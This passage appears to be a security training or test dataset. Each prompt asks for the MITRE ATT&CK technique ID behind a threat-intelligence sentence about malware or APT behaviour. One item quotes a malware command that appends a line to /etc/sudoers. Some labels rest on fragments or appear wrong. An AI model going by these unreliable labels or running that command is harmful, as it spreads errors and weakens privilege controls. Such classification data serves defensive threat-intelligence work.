Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Shamoon accesses network share, enables share access to the target device, copies an executable payload to the target system, and uses a Scheduled Task/Job to execute the malware.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Unlike Exploit Public-Facing Application, the focus of this technique is to exploit software on a client endpoint upon visiting a website.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GrimAgent can use the Windows Command Shell to execute commands, including its own removal.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cardinal RAT applies compression to C2 traffic using the ZLIB library.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MarkiRAT can capture clipboard content.### Assistant: T1115: Clipboard Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has sent spearphishing emails with malicious attachments, including .rtf, .doc, and .xls files.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bonadan can download additional modules from the C2 server.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleSeed has been distributed to victims through malicious e-mail attachments.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Emotet has maintained persistence through a scheduled task.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT37 delivers malware using spearphishing emails with malicious HWP attachments.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zebrocy also uses AES and XOR to decrypt strings and payloads.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.### Assistant: T1586: Compromise Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windshift has used tools to deploy additional payloads to compromised hosts.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also alter other Registry keys in the service’s Registry tree.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QUADAGENT gathers the current domain the victim system belongs to.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BoxCaon used the ""StackStrings"" obfuscation technique to hide malicious functionalities.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar can query the Registry for installed applications.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BRONZE BUTLER has used steganography in multiple operations to conceal malicious payloads.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Any matching files are encrypted and written to a local user directory.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN8 has used RAR to compress collected data before exfiltration.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Are the attackers using any zero-day vulnerabilities? No zero-day vulnerabilities have been found in the analysis of the samples obtained regarding this campaign### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Naikon has used the RoyalRoad exploit builder to drop a second stage loader, intel.wll, into the Word Startup folder on the compromised host.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Exaramel for Windows specifies a path to store files scheduled for exfiltration.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ixeshe has used registry values and file names associated with Adobe software, such as AcroRd32.exe.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Xbash can attempt to exploit known vulnerabilities in Hadoop, Redis, or ActiveMQ when it finds those services running in order to conduct further execution.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remexi achieves persistence using Userinit by adding the Registry key HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Grandoreiro can write or modify browser shortcuts to enable launching of malicious browser extensions.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hancitor has used CallWindowProc and EnumResourceTypesA to interpret and execute shellcode.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In the case of network designs that do not require NAT, address translation can be used by adversaries to obscure their activities, as changing the addresses of packets that traverse a network boundary device can make monitoring data transmissions more challenging for defenders.### Assistant: T1599: Network Boundary Bridging" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Whitefly has used a simple remote shell tool that will call back to the C2 server and wait for commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,One common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency.### Assistant: T1496: Resource Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may modify client software binaries to establish persistent access to systems.### Assistant: T1554: Compromise Client Software Binary" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JCry has used VBS scripts.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike has the ability to load DLLs via reflective injection.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into Spearphishing Attachment payloads.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ShimRat can uninstall itself from compromised hosts, as well create and modify directories, delete, move, copy, and rename files.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Typical drive-by compromise process: 1.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Patchwork collected the victim username and whether it was running as admin, then sent the information to its C2 server.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,More_eggs has used a signed binary shellcode loader and a signed Dynamic Link Library to create a reverse shell.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also combine brute forcing activity with behaviors such as External Remote Services as part of Initial Access.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some data in Remsec is encrypted using RC5 in CBC mode, AES-CBC with a hardcoded key, RC4, or Salsa20.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has used malware that can execute PowerShell scripts via DDE.### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has used CMSTP.exe and a malicious INF to execute its POWERSTATS payload.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has used encoded PowerShell scripts uploaded to CozyCar installations to download and install SeaDuke.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTM can delete all Registry entries created during its execution.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,build_downer has the ability to add itself to the Registry Run key for persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This attack diverged from previous attacks we observed from this group as it involved spear-phishing emails sent to targeted organizations with password protected RAR archive attachments that contained malicious Excel Web Query files (.iqy)### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Socksbot can start SOCKS proxy threads.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Indrik Spider has used PsExec to stop services prior to the execution of ransomware.### Assistant: T1489: Service Stop" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GuLoader has the ability to inject shellcode into a donor processes that is started in a suspended state.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Blue Mockingbird has used wmic.exe to set environment variables.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse the Windows command shell for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 3: The first step of decryption will perform XOR on one byte using the previous adjacent byte, starting from the last byte and excluding the first byte Figure 4: The second step uses RC4, using the first 0x20 bytes from the result of the first step as the RC4 key Figure 5: Encrypted (Top) and decrypted (bottom) configuration file It is also important to note that while the loader component and the configuration file are located in the same directory (%windows%\system32), the encrypted backdoor is located in a different directory (%Program Files%\Common Files\System\ado)### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,One computer that was infected with both Cadelspy and Remexi was a system that ran a SIM card editing application### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can capture screenshots of not only the entire screen, but of each separate window open, in case they are overlapping.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may achieve the same goal by modifying or extending features of the kernel.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RegDuke can store its encryption key in the Registry.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Registering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges or the KRBTGT hash.### Assistant: T1207: Rogue Domain Controller" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The MPK IRC Bot monitors active application windows and writes the title of the open window along with the logged keystrokes to a file at “%temp%\Save.tmp”### Assistant: T1010: Application Window Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may exfiltrate data by transferring the data, including backups of cloud environments, to another cloud account they control on the same service to avoid typical file transfers/downloads and network-based exfiltration detection.### Assistant: T1537: Transfer Data to Cloud Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Elise encrypts several of its files, including configuration files.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat Group-3390 has locally staged encrypted archives for later exfiltration efforts.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Patchwork payload uses process hollowing to hide the UAC bypass vulnerability exploitation inside svchost.exe.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kwampirs collects a list of domain groups with the command net localgroup /domain.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Blue Mockingbird has used Windows Explorer to manually copy malicious files to remote hosts over SMB.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PLEAD has the ability to delete files on the compromised host.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The decrypted shellcode is dropped as a Microsoft Word plugin WLL into C:\Users\ADMINI~1\AppData\Roaming\Microsoft\Word\STARTUP.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook service.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Nidiran can download and execute files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,jRAT can steal keys for VPNs and cryptocurrency wallets.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,iKitten will look for the current IP address.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has used RC4 encryption before exfil.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CookieMiner has looked for files in the user's home directory with ""wallet"" in their name using find.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETWIRE has been spread via e-mail campaigns utilizing malicious links.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN7 sent spearphishing emails with either malicious Microsoft Documents or RTF files attached.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EVILNUM can make modifications to the Regsitry for persistence.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has used the ntdsutil.exe utility to export the Active Directory database for credential access.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silence has been observed making videos of victims to observe bank employees day to day activities.### Assistant: T1125: Video Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The group has also globally opened port 3389.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RDAT can download files via DNS.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kwampirs uses rundll32.exe in a Registry value added to establish persistence.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system.### Assistant: T1176: Browser Extensions" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use MMC commands to perform malicious tasks.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ragnar Locker has used sc.exe to execute a service that it creates.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If an attacker has sufficient permissions, they can disable logging to avoid detection of their activities.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some of the targeted apps were:   Whatsapp YouTube Video Downloader Google Update   Instagram Hack Wifi   AirDroid   WifiHacker   Facebook   Photoshop   SkyTV   Hotstar Trump Dash   PokemonGo With many more to come### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a Phishing.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PROMETHIUM has used a script that configures the knockd service and firewall to only accept C2 connections from systems that use a specified sequence of knock ports.### Assistant: T1205: Traffic Signaling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OceanSalt can collect the name and ID for every process running on the system.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ShimRat can enumerate connected drives for infected host machines.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar downloads have been hosted on Google Docs.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OceanSalt has been delivered via spearphishing emails with Microsoft Office attachments.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Aria-body has established persistence via the Startup folder or Run Registry key.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In the wild, malware has disabled tty_tickets to potentially make scripting easier by issuing echo \'Defaults !tty_tickets\' >> /etc/sudoers .### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The MPK Trojan also monitors specifically for windows that are likely to contain login forms for popular web-based email clients, such as titles that contain: “Gmail -” “Yahoo – login” “Sign In -” “Outlook.com -“ MPK will attempt to parse these window titles to identify the associated email address and record these to the log file using the following format: ///////////// Mail Find /////////// If the Trojan does not find the window titles associated with Gmail, Yahoo or Outlook, it saves the title to the “Save.tmp” file in the following format: +++++++++++++ Window= +++++++++++++ The major difference between the IRC variant and non-IRC variant of MPK is the C2 protocol used### Assistant: T1010: Application Window Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kwampirs uses a large list of C2 servers that it cycles through until a successful connection is established.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Helminth config file is encrypted with RC4.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has used JavaScript for drive-by downloads and C2 communications.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Injects ma32.dll into “wwahost.exe” or “audacity.exe”### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Okrum's loader can detect presence of an emulator by using two calls to GetTickCount API, and checking whether the time has been accelerated.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ThiefQuest encrypts a set of file extensions on a host, deletes the original files, and provides a ransom note with no contact information.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Systemd timers are unit files with file extension .timer that control services.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BOOTRASH is a Volume Boot Record bootkit that uses the VBR to maintain persistence.### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LoudMiner used plists to execute shell scripts and maintain persistence on boot.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has used DLL side-loading to launch versions of Mimikatz and PwDump6 as well as UPPERCUT.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has exfiltrated domain credentials and network enumeration information over command and control channels.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mis-Type may create a file containing the results of the command cmd.exe /c ipconfig /all.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable files with a .scr file extension.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUNSPOT encrypted log entries it collected with the stream cipher RC4 using a hard-coded key.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also create a valid Kerberos ticket using other user information, such as stolen password hashes or AES keys.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TEMP.Veles utilized RDP throughout an operation.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pysa has used Powershell scripts to deploy its ransomware.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Here’s a python code to decode### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TYPEFRAME can search directories for files on the victim’s machine.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Winnti for Linux can encode its configuration file with single-byte XOR encoding.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cannon exfiltrates collected data over email via SMTP/S and POP3/S C2 channels.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chaes has used Python scripts for execution and the installation of additional files.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also look in common key directories, such as ~/.ssh for SSH keys on * nix-based systems or C:\Users\\.ssh\ on Windows.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The service checks every 60 seconds to determine if the malware is running; if not, it will spawn a new instance.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GravityRAT executes commands remotely on the infected host.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUPERNOVA contained Base64-encoded strings.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hunter queried the following URIs in a specific order to determine if the associated software configurations are insecure, and all queries contained the HttpClient User-Agent: GET /manager/html/ — Tomcat web application manager GET /jmx-console/ — JBoss configuration GET /CFIDE/administrator/login.cfm — ColdFusion configuration Installation TG-3390 uses DLL side loading, a technique that involves running a legitimate, typically digitally signed, program that loads a malicious DLL### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper has created the Registry key HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell and sets the value to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may compromise third-party Virtual Private Servers that can be used during targeting.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DEATHRANSOM can delete volume shadow copies on compromised hosts.### Assistant: T1490: Inhibit System Recovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Interactive shells may be accessed through command and control channels or during lateral movement such as with SSH.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has conducted widespread scanning of target environments to identify vulnerabilities for exploit.### Assistant: T1595: Active Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,zwShell can modify the Registry.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Inception has used VBScript to execute malicious commands and payloads.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SoreFang can collect the hostname, operating system configuration, product ID, and disk space on victim machines by executing Systeminfo.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Drovorub has de-obsfuscated XOR encrypted payloads in WebSocket messages.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 attempted to remove evidence of some of its activity by clearing Windows security and system events.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BlackEnergy has used a plug-in to gather credentials from web browsers including FireFox, Google Chrome, and Internet Explorer.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has used various tools to proxy C2 communications.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as Exfiltration Over C2 Channel and Exfiltration Over Alternative Protocol.### Assistant: T1020: Automated Exfiltration" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,* Animate – Create a process from the tainted section of memory and initiate execution.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse Internet browser extensions to establish persistent access to victim systems.### Assistant: T1176: Browser Extensions" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WindTail can identify and add files that possess specific file extensions to an array for archiving.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,IndigoZebra has established domains, some of which were designed to look like official government domains, for their operations.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Group had exploited multiple vulnerabilities for execution, including Microsoft’s Equation Editor , an Internet Explorer vulnerability , CVE-2017-8570, CVE-2017-0199, and CVE-2017-8759.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat Group-3390 has used RAR to compress, encrypt, and password-protect files prior to exfiltration.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Since it is signed and native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information.### Assistant: T1598: Phishing for Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, an executable file attachment named Evil.txt.exe may display as Evil.txt to a user.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Matryoshka is capable of providing Meterpreter shell access.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rocke has looked for IP addresses in the known_hosts file on the infected system and attempted to SSH into them.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WellMail can identify the current username on the victim system.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PipeMon can check for the presence of ESET and Kaspersky security software.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Babuk has the ability to enumerate network shares.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cannon uses SMTP/S and POP3/S for C2 communications by sending and receiving emails.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LightNeuron has used AES and XOR to decrypt configuration files and commands.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Each service unit file may contain numerous directives that can execute system commands: * ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a services is started manually by 'systemctl' or on system start if the service is set to automatically start.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PolyglotDuke can custom encrypt strings.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group keylogger KiloAlfa obtains user tokens from interactive sessions to execute itself with API call CreateProcessAsUserA under that user's context.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HOPLIGHT has multiple C2 channels in place in case one fails.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla surveys a system upon check-in to discover running processes using the tasklist /v command.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may inject portable executables into processes in order to evade process-based defenses as well as possibly elevate privileges.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attacker deception and attribution The deobfuscated PowerShell code used by the MuddyWater group resembles previously seen PowerShell scripts that most likely served as prototypes### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Smoke Loader searches through Outlook files and directories .### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some MiniDuke components use Twitter to initially obtain the address of a C2 server or as a backup if no hard-coded C2 server responds.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sharpshooter has sent malicious Word OLE documents to victims.### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The majority of ActiveX Objects created with Wscript.Shell and Shell.Application are used to run programs, create shortcuts, manipulate the contents of the registry, or access system folders### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SpeakUp downloads and executes additional files from a remote server.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,down_new has the ability to list the directories on a compromised host.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.### Assistant: T1080: Taint Shared Content" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete employed some visual obfuscation techniques by naming variables as combinations of letters to hinder analysis.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Higaisa dropped and added officeupdate.exe to scheduled tasks.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,VB is a programming language created by Microsoft with interoperability with many Windows technologies such as Component Object Model and the Native API through the Windows API.### Assistant: T1059: Command and Scripting Interpreter" "### 